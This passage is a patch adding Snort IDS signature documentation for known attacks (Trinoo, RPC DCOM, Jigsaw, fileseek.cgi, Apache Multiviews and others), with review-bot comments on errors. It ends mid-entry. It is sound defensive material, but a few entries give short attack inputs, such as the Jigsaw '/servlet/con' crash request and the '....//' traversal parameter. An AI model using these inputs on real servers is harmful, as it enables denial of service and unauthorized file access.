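Review bot: "Additional References:" cites "OpenNap Specification http://opennap.sourceforge.net/napster.txt", which has no bearing on a generic attack-response rule and looks copied from a peer-to-peer rule's documentation; remove it or replace it with something relevant to attack-responses.rules. Also "sucessful" appears three times ("Summary:", "Detailed Information:") and should be "successful", and the credential-validation paragraph under "Detailed Information:" describes an attack vector rather than the response the rule detects; the file should say what content in the server's reply Sid 561 matches, since that is what an analyst needs to triage the event.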
--- /dev/null
+++ b/doc/signatures/223.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+223
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
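Review bot: "Affected Systems:" is empty (the line after it holds only a single space), so the file never says which hosts are involved; fill it in, for example "Any host on which the Trinoo daemon has been installed.", and strip the trailing whitespace. Also "DDos suite" in "Summary:" should be "DDoS suite" to match "Distributed Denial of Service (DDoS)" under "Impact:", the blank line between "Rule:" and "--" is missing, and "None Known" should follow the "None known." capitalisation used elsewhere in the patch.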
--- /dev/null
+++ b/doc/signatures/3332.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3332
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
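Review bot: this file repeats 3349.txt verbatim apart from the Sid, so it inherits the same defects: "Attack Scenarios:" describes an overly long filename on a network share while "Detailed Information:" describes a malformed RPC DCOM request, "Expoit" should be "Exploit", and "Additional References:" is empty. Since Sids 3349 and 3332 are distinct rules, "Detailed Information:" should also say what each one matches (which part of the DCOM request the rule covers) rather than sharing the same paragraph.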
--- /dev/null
+++ b/doc/signatures/2738.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2738
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
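Review bot: same line-break defect as in 2916.txt: the period of "vulnerability in the procedure alter_priority_number" sits alone on the next line before "This procedure is included in" / "dbms_repcat."; join the sentence. "Affected Systems:" again reads "Oracle Oracle9i", and the package is given as "dbms_repcat" here but schema-qualified as "sys.dbms_repcat_sna" in 2916.txt; use one form consistently. "Corrective Action:" still lacks a period after "patch".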
--- /dev/null
+++ b/doc/signatures/1831.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+
+1831
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a Denial of Service (DoS) condition in the Jigsaw web server from W3C.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Jigsaw is a Java-based web server developed by W3C. Jigsaw version 2.2.1 is vulnerable to a DoS attack caused by improper handling of requests for DOS device names.
+
+Jigsaw web server versions prior to 2.2.1 (Build 20020711)  contain a Denial of Service vulnerability in a handler that processes HTTP requests for DOS device files. This may result in process threads hanging and a consumption of all available resources.
+
+
+--
+Affected Systems:
+	Jigsaw 2.2.1
+
+--
+Attack Scenarios:
+It is possible to crash the Jigsaw web server by requesting /servlet/con about 30 times.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Certain HTTP requests may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Jigsaw (2.2.1 Build 20020711 or later)
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5258/
+
+--
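Review bot: the version information in this file contradicts itself: "Detailed Information:" first says "Jigsaw version 2.2.1 is vulnerable to a DoS attack", then says versions "prior to 2.2.1 (Build 20020711)" are vulnerable; "Affected Systems:" lists "Jigsaw 2.2.1"; and "Corrective Action:" recommends "2.2.1 Build 20020711 or later". If the fix is build 20020711 of 2.2.1, "Affected Systems:" should read "Jigsaw 2.2.1 builds prior to 20020711 and earlier versions" and the first paragraph should be corrected to match. Also there is a stray blank line between "Sid:" and "1831", a doubled blank line before "--" after "Detailed Information:", a double space in "(Build 20020711)  contain", and "Corrective Action:" lacks a terminal period.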
--- /dev/null
+++ b/doc/signatures/2207.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2207
+
+--
+Summary:
+This event is generated when an attempt is made to access fileseek.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal or remote command execution vulnerability in Wiley Computer Publishing Craig Patchett FileSeek.cgi.
+
+--
+Impact:
+Information gathering or remote execution of arbitrary code.
+
+--
+Detailed Information:
+FileSeek.cgi is an example script that locates and downloads files on a web server, available in "The CGI/Perl Cookbook," written by Craig Patchett and published by John Wiley & Sons. It contains two vulnerabilities due to erroneous parsing -- an attacker could use "....//" in the HEAD or FOOT parameter of an HTTP request to fileseek.cgi to view arbitrary files on the server or could use a similar method to execute shell commands on the web server. Both actions will be performed with the security context of the web server.
+
+--
+Affected Systems:
+Any web server running fileseek.cgi.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server, and is then able to view files on the server. In addition, an attacker could send a specially crafted HTTP request that contains shell commands to the web server. The web server would then attempt to execute the commands in the request.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses fileseek.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6783
+http://www.securityfocus.com/bid/6784
+
+--
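Review bot: "Corrective Action:" is empty, yet "Detailed Information:" gives enough to fill it: fileseek.cgi is an example script from a book, so the advice should be to remove it (and other sample scripts) from production web servers or restrict access to it, and to check web server logs for requests to fileseek.cgi containing "....//" in the HEAD or FOOT parameter. Also "Rule:" carries trailing whitespace, and "Bugtraq" under "Additional References:" lacks the colon used in the other files.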
--- /dev/null
+++ b/doc/signatures/1519.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1519
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in 
+Apache that can result in a listing of directory contents.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+When "Multiviews" are used to negotiate a directory index, a specially 
+crafted URL can be used to obtain a directory listing instead of the 
+index page.
+
+--
+Affected Systems:
+	Apache 1.3.11, 1.3.14 to 1.3.20
+
+--
+Attack Scenarios:
+An attacker can use this exploit to view sensitive information
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+The presence of the string "/?M=D" within an incoming http packet can 
+cause this rule to generate an event.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+
+--
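Review bot: the only place the rule's match content ("/?M=D") is documented is the "False Positives:" section; "Detailed Information:" should state that the rule looks for this query string in requests to an Apache server using Multiviews, so an analyst can relate the event to the request that caused it. Also "Attack Scenarios:" ("An attacker can use this exploit to view sensitive information") lacks a period, "Additional References:" is empty with two blank lines, and several lines ("Summary:", "Ease of Attack:", "Corrective Action:", the contributor line) carry trailing whitespace.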
--- /dev/null
+++ b/doc/signatures/2936.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
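Review bot: style only: "Impact:" ("Serious. Execution of arbitrary code with system level privileges") and the first line of "Corrective Action:" ("Apply the appropriate vendor supplied patches") are missing terminal periods, and "system level" should be hyphenated as "system-level" where it modifies "privileges". Otherwise this is one of the few files in the patch that cites a vendor bulletin under "Additional References:"; the RPC DCOM and Oracle files should do the same.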
--- /dev/null
+++ b/doc/signatures/1142.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1142
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
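Review bot: "Summary:" and "Detailed Information:" describe "a known vulnerability on a web server or a web application" generically and say "the attack scenarios are legion", so nothing in the file says what Sid 1142 actually matches; name the request or URI the rule detects and add a reference under the empty "Additional References:". Also "attackers choosing" in "Impact:" should be "attacker's choosing", and "Web server" in "Detailed Information:" is capitalised inconsistently with "web server" elsewhere.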
--- /dev/null
+++ b/doc/signatures/3201.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+3201
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+httpodbc.dll.
+
+--
+Impact:
+Serious. Remote code execution is possible.
+
+--
+Detailed Information:
+Versions of Microsoft Internet Information Server (IIS) and Microsoft
+Personal Web Server (PWS) are vulnerable to a directory traversal attack
+that may lead to access of certain sensitive system files.
+
+This event is generated when an attempt is made to access the file
+httpodbc.dll. This may indicate nimda worm activity.
+
+--
+Affected Systems:
+	Microsoft IIS 3.0
+	Microsoft IIS 4.0
+	Microsoft PWS
+
+--
+Attack Scenarios:
+This may indicate worm activity.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
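Review bot: "Detailed Information:" mentions a directory traversal in IIS and PWS and then, separately, that access to httpodbc.dll "may indicate nimda worm activity", without explaining how the two relate (why a request for httpodbc.dll follows the traversal); spell out the link and capitalise "Nimda" as a proper noun. "Attack Scenarios:" ("This may indicate worm activity.") only repeats the previous sentence. "Additional References:" is empty; the vendor bulletin for the IIS traversal and a Nimda advisory should be cited so that "Apply the appropriate vendor supplied patches." is actionable. "Ease of Attack:" carries trailing whitespace, and "None Known." should match the "None known." form.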
--- /dev/null
+++ b/doc/signatures/3180.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3180
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
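Review bot: third verbatim copy of the RPC DCOM text (see 3349.txt and 3332.txt above): the "Attack Scenarios:" network-share filename description still contradicts the RPC DCOM "Detailed Information:", "Expoit" is still misspelt, and "Additional References:" is still empty; fix the shared text once and state what distinguishes Sid 3180 from the other DCOM rules.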
--- /dev/null
+++ b/doc/signatures/100000105.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000105
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "lolita sex" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
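Review bot: "Ease of Attack: Simple." and the "Attack Scenarios:" section do not fit a content/policy rule; there is no attack here, as "Impact: Possible policy violation." already says, so mark those sections "Not applicable" or describe the observation instead. "False Positives: None known." is doubtful for a plain-string content match on "lolita sex", which can fire on the phrase appearing in unrelated text; say that legitimate traffic containing the string will trigger the rule. "Affected Systems:" has a leading space before "All systems.", and "refer to the appropriate internal policy" in "Corrective Action:" is a comma splice (use a semicolon or a new sentence).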
--- /dev/null
+++ b/doc/signatures/3380.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3380
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
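Review bot: fourth copy of the same RPC DCOM text (3349, 3332, 3180); the same "Attack Scenarios:"/"Detailed Information:" mismatch, "Expoit" typo, and empty "Additional References:" apply. Consider generating these files from one shared template or at least stating in each which DCOM request this Sid covers, so that the four documents are not interchangeable.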
--- /dev/null
+++ b/doc/signatures/1804.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1804
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
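Review bot: "Detailed Information:" says only that "Many known vulnerabilities exist for this platform and the attack scenarios are legion", so, as with 1142.txt, the file does not say what request Sid 1804 matches; name the URI or content the rule detects and add a reference under the empty "Additional References:". Also "attackers choosing" in "Impact:" should be "attacker's choosing".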
--- /dev/null
+++ b/doc/signatures/674.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+674
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
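Review bot: the Affected Systems section is empty, and the Summary only says `vulnerability in Microsoft SQL` without naming the product version or the weakness. Suggest at least `All systems running Microsoft SQL Server` (matching the wording of the other files) and a reference under Additional References, which is also empty. The Corrective Action advice to `Disallow administrative access from sources external to the protected network` is the useful part here and should be kept.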
--- /dev/null
+++ b/doc/signatures/3341.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3341
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
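Review bot: typo on the Ease of Attack line, `Simple. Expoit code exists.` should read `Exploit`. More importantly, this text is repeated verbatim for SIDs 3326, 3288, 3427, 3247 and 3216 below, and none of the six files names the specific RPC DCOM vulnerability, bulletin or CVE, so the reader cannot tell why there are six rules or which weakness a given alert refers to; Additional References is empty in all of them. Suggest giving each file the distinguishing detail of the RPC request it detects plus a vendor bulletin reference. Attack Scenarios (`a request for a file with an overly long filename via a network share`) also does not explain how that relates to the `malformed request to an RPC port` described in Detailed Information; one connecting sentence would help.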
--- /dev/null
+++ b/doc/signatures/3326.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3326
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
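Review bot: same comments as for 3341.txt above: `Expoit` typo in Ease of Attack, text identical to the other RPC DCOM files with no SID-specific detail, and an empty Additional References section.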
--- /dev/null
+++ b/doc/signatures/2415.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2415
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
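Review bot: Impact is just `Serious`, which tells the analyst nothing; Attack Scenarios says the attacker `may attempt to delete keys and security associations`, so Impact should state that consequence explicitly (existing security associations torn down, i.e. a denial of service against the peers using them). Affected Systems says `Kame Racoon` while Attack Scenarios says `KAME IKE Daemon`; use one name. `None Known` under False Negatives and `patches` without a period in Corrective Action are inconsistent with the other sections.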
--- /dev/null
+++ b/doc/signatures/837.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+837
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
